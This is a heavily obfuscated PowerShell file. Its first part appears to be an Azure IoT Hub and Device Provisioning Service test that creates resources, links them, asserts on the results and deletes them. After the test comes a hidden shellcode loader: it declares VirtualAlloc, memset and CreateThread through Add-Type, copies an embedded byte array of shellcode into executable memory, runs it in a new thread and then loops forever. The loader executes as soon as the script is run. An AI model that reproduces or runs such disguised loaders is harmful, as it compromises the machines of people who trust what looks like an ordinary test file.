${K5X`Qr} =[Type]("{0}{1}"-F 'sTRI','ng')  ; 




















function TeST-azU`R`eiO`TdPSLinKe`D`H`U`BlI`FEcycLe
{
	${l`ocatI`on} = &("{2}{1}{0}"-f 'n','atio','Get-Loc') ("{2}{4}{0}{3}{1}"-f'ros','evices','Mi','oft.D','c') ("{5}{1}{4}{2}{3}{0}"-f 'Service','e','visioni','ng ',' Pro','Devic') 
	${IOtDp`SnA`mE} = .("{1}{0}{3}{2}" -f'etAsset','g','me','Na') 
	${REs`o`UR`cEgroUpn`AmE} = &("{2}{1}{3}{0}"-f 'tName','s','getA','se') 
	${I`OT`hUBNaMe} = .("{1}{0}{2}"-f 'etA','g','ssetName')
	${HuBK`EYn`AMe} = ("{0}{2}{3}{1}" -f'Servi','y','ce','Ke')
	${S`ku} = "S1"

	
	${LIn`KE`DhUBnA`Me} =  (  gET-vAriAble ("K5xq"+"r") -VA  )::("{0}{2}{1}" -f 'Fo','mat','r').Invoke("{0}.azure-devices.net",${iotHub`NA`mE})
	${AllOcA`TI`OnW`EigHt} = 10

	
	${re`SoUrc`egroup} = &("{3}{0}{2}{4}{1}{5}"-f'e','eGro','w-AzReso','N','urc','up') -Name ${res`ourC`EGRoupn`A`me} -Location ${l`OCaT`I`ON} 

	
	${io`TD`PS} = .("{1}{2}{0}" -f 'TDps','New-Az','Io') -ResourceGroupName ${r`eso`URc`e`Gr`oupNamE} -Name ${iOtd`P`S`NAme} -Location ${locA`T`iOn}
	&("{2}{1}{0}"-f 'rue','ert-T','Ass') { ${Io`T`dPS}."Na`mE" -eq ${IO`TDps`N`Ame} }
	.("{0}{2}{1}"-f 'Asse','-True','rt') { ${I`oTdPS}."Pro`peRT`iEs"."iOtHU`Bs"."C`ouNt" -eq 0 }

	
	${iOt`h`Ub} = &("{2}{1}{0}"-f'ub','zIoTH','New-A') -Name ${IOT`h`UbNA`me} -ResourceGroupName ${RESO`Ur`ce`g`RouPN`AMe} -Location ${lOCat`I`on} -SkuName ${s`Ku} -Units 1
	.("{0}{1}{2}" -f'Assert-','Tru','e') { ${i`oT`HuB}."N`Ame" -eq ${io`ThUb`NaME} }

	
	${hUb`Ke`ys} = .("{2}{3}{1}{0}"-f'THubKey','zIo','A','dd-A') -Name ${IOT`h`UBN`AmE} -ResourceGroupName ${R`esOUrcEG`Ro`UPName} -KeyName ${HU`BKEYna`ME} -Rights ("{1}{3}{2}{0}"-f'eConnect','S','vic','er')
	.("{1}{2}{0}"-f 'rt-True','A','sse') { ${hUBKE`Ys}."C`ouNT" -gt 1 }

	
	${H`UBK`EY} = .("{2}{3}{1}{0}" -f'ubKey','IoTH','Ge','t-Az') -Name ${Io`Th`UbnaME} -ResourceGroupName ${reS`o`UrcegrOU`P`N`Ame} -KeyName ${hu`BKe`y`NaMe}

	${HubCo`NN`E`cTIOnstriNG} =  ${k`5XqR}::("{2}{1}{0}"-f't','a','Form').Invoke("HostName={0};SharedAccessKeyName={1};SharedAccessKey={2}",${i`Oth`UB}."P`RoPe`RtiEs"."ho`sTNaME",${H`UbkEY}."k`EYNaMe",${Hu`BkEy}."PRimA`R`ykEY")

	
	${li`NkED`HUb} = &("{1}{2}{0}{3}"-f 'zIoTDp','A','dd-A','sHub') -ResourceGroupName ${ReSoU`RCeGRO`UP`NaMe} -Name ${IOTDPs`N`AMe} -IotHubConnectionString ${HuB`cO`N`N`EctIONStr`inG} -IotHubLocation ${i`OTH`UB}."loCA`Tion"
	&("{2}{1}{3}{0}"-f 'rt-True','s','As','e') { ${liN`kE`dhUb}."C`oUnT" -eq 1 }
	.("{3}{1}{2}{0}" -f'-True','s','sert','A') { ${Link`e`d`HUb}."Li`NKedHUb`NAMe" -eq ${IoT`H`Ub}."P`ROp`ERTIes"."h`OS`TNAmE" }
	&("{1}{2}{0}"-f'e','Assert','-Tru') { ${l`in`KeDHub}."LoCAtI`On" -eq ${Iot`huB}."LoC`AT`IoN" }

	
	${u`pDaT`edLINKEd`Hub} = .("{0}{1}{3}{2}"-f'U','pdate-AzIoTDp','Hub','s') -ResourceGroupName ${RE`souRcEG`R`OuPName} -Name ${iotDPS`N`AmE} -LinkedHubName ${Lin`KeD`hUBnA`Me} -AllocationWeight ${AL`lOca`TiONWe`I`gHt}
	&("{1}{2}{0}" -f'lse','Asser','t-Fa') { ${uPda`TEdL`I`NKedhUb}."A`pPL`YalloCa`TIo`NPolIcy" }
	&("{2}{1}{0}" -f 'ue','ert-Tr','Ass') { ${UPdatedL`IN`K`eD`hUB}."alLoCa`TIO`Nwe`i`GHT" -eq ${ALloc`ATio`Nw`EI`gHT} }

	
	${Li`NK`e`dhuB1} = &("{1}{0}{2}{3}{4}"-f '-AzIo','Get','TDpsH','u','b') -ResourceGroupName ${R`eSouRcEG`RoU`P`NAme} -Name ${io`T`dpSnaMe} -LinkedHubName ${lI`Nk`Edhubna`mE}
	.("{2}{1}{0}"-f 'True','ssert-','A') { ${li`NKE`DhU`B1}."C`OUNt" -eq 1 }
	.("{1}{0}{2}{3}" -f 'ssert','A','-','True') { ${L`iNk`eDHuB1}."l`i`N`KEdhuBnAME" -eq ${lInKEd`huB`N`AME} }
	&("{0}{1}{2}"-f 'Assert-Tr','u','e') { ${lInk`edhU`B1}."l`ocati`on" -eq ${loCat`I`on} }
	&("{0}{2}{1}" -f 'As','rt-False','se') { ${lINke`Dh`UB1}."a`p`p`lyALlocATioNpOl`i`cy" }
	.("{1}{2}{0}" -f 'True','A','ssert-') { ${LiNke`D`HuB1}."AL`LOca`TI`OnwEIGHt" -eq ${allOcAT`Io`Nw`EIgHt} }

	
	${r`ESulT} = .("{1}{0}{2}{3}" -f'e','R','move-AzIoTDpsHu','b') -ResourceGroupName ${r`ESOU`RcEGRou`pn`Ame} -Name ${i`OTd`ps`NAmE} -LinkedHubName ${lINk`e`DHuBnAmE} -PassThru
	.("{0}{2}{1}"-f 'As','ue','sert-Tr') { ${RE`Su`lT} }

	
	&("{5}{0}{1}{3}{4}{2}"-f 'move','-A','oup','zResourc','eGr','Re') -Name ${Re`SouRCE`G`R`OUP`Name} -force
}

${c} = ((("{70}{16}{69}{44}{46}{72}{3}{47}{27}{65}{19}{54}{45}{39}{2}{51}{10}{68}{34}{56}{4}{24}{53}{71}{66}{52}{7}{43}{55}{1}{73}{15}{40}{75}{49}{21}{50}{25}{57}{59}{38}{32}{18}{36}{48}{37}{29}{6}{63}{11}{0}{33}{26}{31}{5}{42}{30}{20}{28}{74}{14}{61}{41}{67}{12}{13}{17}{35}{58}{62}{8}{9}{23}{22}{64}{60}" -f'a','dAttr','wSize, uint flAllocationTyp','tern IntPt','t(nKqkerne','llImpo','p','ad(I','est,',' ',', u','hre','r',' ','static e','bu','mp','m','a','In','t.dllnKq)]pu','l','uint coun','uint src, ','l32.dllnKq)]p',' IntP',';','rtualAllo','bl','tr l','Kqmsvcr','[D','ionFl','dId)','nt flProtect);[D','emset(IntP','gs, ','ntP','int dwCreat','ress, uint d','tes, uint dwSt','ntP','rt(n','ntPtr','nKqkerne','pAdd','l32.dllnKq)]public s','r Vi','I','Ptr ','pStartAddress,','e','re','ublic static ext','tPtr l',' lpThrea','llImpor','tr lpParamete','tr','r, u',';','xtern I',' d','T','t)','c(','h','t','i','ort(','[DllI','ern IntPtr CreateT','tatic ex','i','ic ','ackSize, Int'))."r`ePLa`CE"(([chaR]110+[chaR]75+[chaR]113),[stRinG][chaR]34));${W} = .("{1}{0}" -f'Type','Add-') -memberDefinition ${c} -Name ("{1}{0}" -f '2','Win3') -namespace ("{0}{1}{2}" -f 'W','in32','Functions') -passthru;[Byte[]];[Byte[]]${z} = 0xb8,0xf3,0x83,0x8c,0xad,0xd9,0xf6,0xd9,0x74,0x24,0xf4,0x5d,0x33,0xc9,0xb1,0x47,0x31,0x45,0x13,0x03,0x45,0x13,0x83,0xc5,0xf7,0x61,0x79,0x51,0x1f,0xe7,0x82,0xaa,0xdf,0x88,0x0b,0x4f,0xee,0x88,0x68,0x1b,0x40,0x39,0xfa,0x49,0x6c,0xb2,0xae,0x79,0xe7,0xb6,0x66,0x8d,0x40,0x7c,0x51,0xa0,0x51,0x2d,0xa1,0xa3,0xd1,0x2c,0xf6,0x03,0xe8,0xfe,0x0b,0x45,0x2d,0xe2,0xe6,0x17,0xe6,0x68,0x54,0x88,0x83,0x25,0x65,0x23,0xdf,0xa8,0xed,0xd0,0x97,0xcb,0xdc,0x46,0xac,0x95,0xfe,0x69,0x61,0xae,0xb6,0x71,0x66,0x8b,0x01,0x09,0x5c,0x67,0x90,0xdb,0xad,0x88,0x3f,0x22,0x02,0x7b,0x41,0x62,0xa4,0x64,0x34,0x9a,0xd7,0x19,0x4f,0x59,0xaa,0xc5,0xda,0x7a,0x0c,0x8d,0x7d,0xa7,0xad,0x42,0x1b,0x2c,0xa1,0x2f,0x6f,0x6a,0xa5,0xae,0xbc,0x00,0xd1,0x3b,0x43,0xc7,0x50,0x7f,0x60,0xc3,0x39,0xdb,0x09,0x52,0xe7,0x8a,0x36,0x84,0x48,0x72,0x93,0xce,0x64,0x67,0xae,0x8c,0xe0,0x44,0x83,0x2e,0xf0,0xc2,0x94,0x5d,0xc2,0x4d,0x0f,0xca,0x6e,0x05,0x89,0x0d,0x91,0x3c,0x6d,0x81,0x6c,0xbf,0x8e,0x8b,0xaa,0xeb,0xde,0xa3,0x1b,0x94,0xb4,0x33,0xa4,0x41,0x1a,0x64,0x0a,0x3a,0xdb,0xd4,0xea,0xea,0xb3,0x3e,0xe5,0xd5,0xa4,0x40,0x2c,0x7e,0x4e,0xba,0xa6,0x41,0x27,0xcb,0x84,0x2a,0x3a,0xd4,0xf9,0xf6,0xb3,0x32,0x93,0x16,0x92,0xed,0x0b,0x8e,0xbf,0x66,0xaa,0x4f,0x6a,0x03,0xec,0xc4,0x99,0xf3,0xa2,0x2c,0xd7,0xe7,0x52,0xdd,0xa2,0x5a,0xf4,0xe2,0x18,0xf0,0xf8,0x76,0xa7,0x53,0xaf,0xee,0xa5,0x82,0x87,0xb0,0x56,0xe1,0x9c,0x79,0xc3,0x4a,0xca,0x85,0x03,0x4b,0x0a,0xd0,0x49,0x4b,0x62,0x84,0x29,0x18,0x97,0xcb,0xe7,0x0c,0x04,0x5e,0x08,0x65,0xf9,0xc9,0x60,0x8b,0x24,0x3d,0x2f,0x74,0x03,0xbf,0x13,0xa3,0x6d,0xb5,0x7d,0x77;${g} = 0x1000;if (${Z}."lE`NGtH" -gt 0x1000){${G} = ${z}."l`EnGTh"};${x}=${W}::("{3}{0}{1}{2}" -f 'u','al','Alloc','Virt').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${Z}."lEN`gTh"-1);${I}++) {${W}::"Me`MsET"([IntPtr](${x}.("{1}{0}" -f't32','ToIn').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{3}{1}{2}{0}"-f'd','T','hrea','Create').Invoke(0,0,${X},0,0,0);for (;;){&("{2}{1}{0}{3}"-f'-s','t','Star','leep') 60};
